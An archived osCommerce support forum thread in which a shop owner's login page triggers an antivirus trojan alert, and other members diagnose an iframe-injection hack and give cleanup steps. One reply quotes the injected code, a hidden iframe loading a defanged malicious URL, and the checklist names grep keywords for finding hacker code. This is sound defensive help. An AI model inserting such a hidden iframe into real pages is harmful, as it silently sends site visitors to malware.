Jump to content
  • Checkout
  • Login
  • Get in touch

osCommerce

The e-commerce.

JS:Redirector-HV [Trj] Whenever I visit my Login.php page


CTre

Recommended Posts

Whenever I go to my sites login page.. I receive this warning in my anti virus program.

JS:Redirector-HV [Trj

 

I have searched for help on the forums, and elsewhere but I haven't been able to find a solution. I took the antivirus off and examined the page but still I found nothing. Hopefully somebody knows a solution. Here is the link http://stylegrounds.com/login.php

Link to comment
Share on other sites

Your website has been hacked !

 

Follow these steps to clean and secure your website:

 

1) Lock down your site by using an .htaccess password so your customers are not attacked by the hackers code.

 

2) FTP all of the files to your local machine and use a program like WinGrep to identify and remove all malicious and anomalous files containing hacker code. Look for keywords such as 'base64','eval','decode'.

 

3) Delete the files on your hosting account before uploading the clean files.

 

4) FTP the clean files back to your hosting account and read and implement the security patches and contributions found in these two threads. Admin Security and Website Security.

 

5) Change all of your passwords: FTP, CPANEL, STORE ADMIN and DATABASE

 

6) Make sure File and Directory Permissions are set correctly. Directories no higher than 755, Files no higher than 644 and the TWO configure.php files no higher than 444

 

7) If your site has been 'black listed' as an attack site by Google, then log into Google Webmaster Tools and submit the site to be re-indexed and verified to be removed from the 'black list'

 

8) Remove the .htaccess password protection so your customers can resume making purchases from your website.

 

9) Monitor your website using the newly installed contributions to prevent future hacker attacks.

 

10) If you feel you can not perform any of the above steps, you should seek professional help to ensure all malware is removed.

 

 

Chris

Link to comment
Share on other sites

Ensure you remove ALL anomalous files as they are usually backdoors which will allow the hacker to gain access to your website at anytime.

 

 

 

 

 

Chris

Link to comment
Share on other sites

Whenever I go to my sites login page.. I receive this warning in my anti virus program.

JS:Redirector-HV [Trj

 

I have searched for help on the forums, and elsewhere but I haven't been able to find a solution. I took the antivirus off and examined the page but still I found nothing. Hopefully somebody knows a solution. Here is the link http://stylegrounds.com/login.php

You might glance at this.

 

Looks like you're a victim.

 

From the page source (slightly modified):

 

<td width="100%" class="main" colspan="3"><font color="#FFFFFF">I am a new customer.</font><br><br><font color="#FFFFFF">By creating an account at Stylegrounds<iframe src='hxxp://willysy.com/images/banners/' style='position:absolute;visibility:hidden'></iframe> you will be able to shop faster, be up to date on an orders status, and keep track of the orders you have previously made.</font></td>

If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you.

 

"Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice."

- Me -

 

"Headers already sent" - The definitive help

 

"Cannot redeclare ..." - How to find/fix it

 

SSL Implementation Help

 

Like this post? "Like" it again over there >

Link to comment
Share on other sites

I agree, You are a victim of the iframe injection but you are also a victim of the admin vulnerability hack. You have a lot of work to do.

 

 

 

 

 

Chris

Link to comment
Share on other sites

Thanks guys.. I got the malware off, by going to the Configuration in admin, where an Iframe was placed in the Store name form. But like Dunweb said. I have alot of work to do!

Link to comment
Share on other sites

Thanks guys.. I got the malware off, by going to the Configuration in admin, where an Iframe was placed in the Store name form. But like Dunweb said. I have alot of work to do!

 

 

That was only one hack on your site. There are still hacker files in your /images directory and more than likely elsewhere on your server.

 

 

 

 

 

Chris

Link to comment
Share on other sites

That was only one hack on your site. There are still hacker files in your /images directory and more than likely elsewhere on your server.

 

 

 

 

 

Chris

 

yes they're in the admin somewhere because its keep getting hacked. The problem with my website is that I have CRE Loaded 6.15 and not oscommerce so its hard for me to get those same contributions. Some of them have a alternate way of being installed.

Link to comment
Share on other sites

Yes, the contribution may have to be modified to integrate into your CRE loaded site. In fact, you should be seeking support from the CRE forum, not osCommerce.

 

 

 

 

Chris

Link to comment
Share on other sites

Archived

This topic is now archived and is closed to further replies.

×
×
  • Create New...